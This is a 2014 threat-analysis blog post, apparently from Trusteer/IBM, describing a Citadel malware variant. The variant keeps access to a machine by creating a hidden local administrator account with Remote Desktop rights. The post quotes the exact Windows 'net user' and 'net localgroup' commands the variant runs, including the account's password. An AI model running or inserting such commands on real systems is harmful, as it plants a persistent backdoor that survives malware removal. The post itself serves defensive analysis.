July 29, 2014 By Etay Maor 3 min read

Using malware to control a malware-infected device is nothing new. In fact, in our article about malware trends in 2014, Trusteer, an IBM Company, Chief Technology Officer Amit Klein specifically points out that malware will again use old-school techniques to overcome security solutions. One of these tools is the ability to remotely take over a device and use it to commit fraud.

Most advanced types of malware have this ability today, including SpyEye’s use of Remote Desktop Protocol (RDP) and Zeus’ and Citadel’s use of Virtual Network Connection (VNC). The security team at Trusteer, an IBM company, has just discovered a Citadel variant that takes this approach a step further, providing enhanced survivability for the attack as well as expanding this malware’s capabilities to perpetrate targeted attacks on enterprises.

The Rise of Remote Control

The use of RDP and VNC protocols to take over devices is widely used by information technology support teams. When users have issues, they can call technical support, and a support engineer can take over the device to solve the problem. Malware authors have added this functionality to their malware to allow the attacker to take over a victim’s device. Attackers who target high-net-worth accounts cannot rely on automated scripts for their attacks since an attack attempting to steal a six- or seven-digit amount has to be carefully and manually conducted.

View on-demand webinar: Cybercriminals Never Sleep

This manual process does have benefits, though. First, this evades some security solutions that specifically search for behavior associated with automatic scripts. Second, it allows the attacker to take over an authenticated session and use HTML injection to ask the victim for additional information (such as one-time passwords) in real time. Third, it allows the attacker to circumvent device ID security systems as the attack is coming from the legitimate user’s device, not from the attacker’s device.

Citadel, a malware based on Zeus, has offered VNC capabilities since its first version. Additionally, Citadel offers the attacker the ability to run Windows shell commands. These commands are handy if the attacker wants to get a clearer picture of the network in which the infected PC resides, scan it and prepare the grounds for something more than just fraud. This type of network mapping is one of the first steps attackers take in targeted enterprise attacks. They gather intelligence, get a clear picture of the target and then strike. This capability was highlighted when Citadel was introduced to the fraudster underground. Citadel’s advertisement stated, “AutoCMD (This is a good feature to have when analyzing a company’s internal structure).” But Citadel is faced with a problem: If the malware is detected and removed by the victim, the VNC capabilities are lost with it. A recent variant analyzed by Trusteer’s security team demonstrated how attackers, who are likely using Citadel to target enterprises, have found a solution to this problem.

How It Works

The new variant uses a simple yet effective trick. After the device is infected, the ability to run Windows shell commands is used for more than just reconnaissance. The variant also executes the following commands:

  1. net user coresystem Lol117755C /add
  2. net localgroup Administrators coresystem /add
  3. net localgroup ‘Remote Desktop Users’ coresystem /add
  4. net accounts /maxpwage:unlimited

These commands do the following:

  1. Add a new Windows local user (username: “coresystem,” password: “Lol117755C”)
  2. Add the new user to the local administrator group
  3. Add the new user to the local RDP group
  4. Set the password to never expire

Why Hackers Use Citadel

Now, even if the Citadel malware is detected and removed, the attacker still has access to the infected machine through the native Windows RDP capabilities. The attacker has set up a backup back door into the infected device. Attackers benefit in the following ways when utilizing such a trick, especially when they are preparing for a persistent, long-term attack against an enterprise:

  • Persistency: Even if Citadel (and its VNC module) are lost, the attacker can still use RDP to access the device.
  • The illusion of safety: A user who was vigilant enough to detect and remove Citadel will now feel safe to use his or her device, thinking it is clean.
  • Flying under the radar: While malware modules (such as VNC) and communications may be more vulnerable to interception and analysis by security software, using the Windows-native RDP capabilities may fly under the radar as some companies actually use this exact same protocol for technical support.

Citadel operators are clearly investing in their attack’s survivability as well as using the malware’s features to target companies, and not even for its original target: financial fraud. Trusteer Rapport (for bank users) and Trusteer Apex (for enterprise users) can detect and prevent Citadel’s infection and its ability to operate with multiple layers of defense that block the threat along with the attack kill chain, preventing the malware from ever infecting the targeted device and running the Windows shell commands. Trusteer’s security team is constantly on the lookout for new and emerging threats and techniques.

More from Malware

Ongoing ITG05 operations leverage evolving malware arsenal in global campaigns

13 min read - As of March 2024, X-Force is tracking multiple ongoing ITG05 phishing campaigns featuring lure documents crafted to imitate authentic documents of government and non-governmental organizations (NGOs) in Europe, the South Caucasus, Central Asia, and North and South America. The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated documents associated with finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production. Beginning in November 2023, X-Force observed ITG05…

X-Force Threat Intelligence Index 2024 reveals stolen credentials as top risk, with AI attacks on the horizon

4 min read - Every year, IBM X-Force analysts assess the data collected across all our security disciplines to create the IBM X-Force Threat Intelligence Index, our annual report that plots changes in the cyber threat landscape to reveal trends and help clients proactively put security measures in place. Among the many noteworthy findings in the 2024 edition of the X-Force report, three major trends stand out that we’re advising security professionals and CISOs to observe: A sharp increase in abuse of valid accounts…

Hive0051’s large scale malicious operations enabled by synchronized multi-channel DNS fluxing

12 min read - For the last year and a half, IBM X-Force has actively monitored the evolution of Hive0051’s malware capabilities. This Russian threat actor has accelerated its development efforts to support expanding operations since the onset of the Ukraine conflict. Recent analysis identified three key changes to capabilities: an improved multi-channel approach to DNS fluxing, obfuscated multi-stage scripts, and the use of fileless PowerShell variants of the Gamma malware. As of October 2023, IBM X-Force has also observed a significant increase in…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today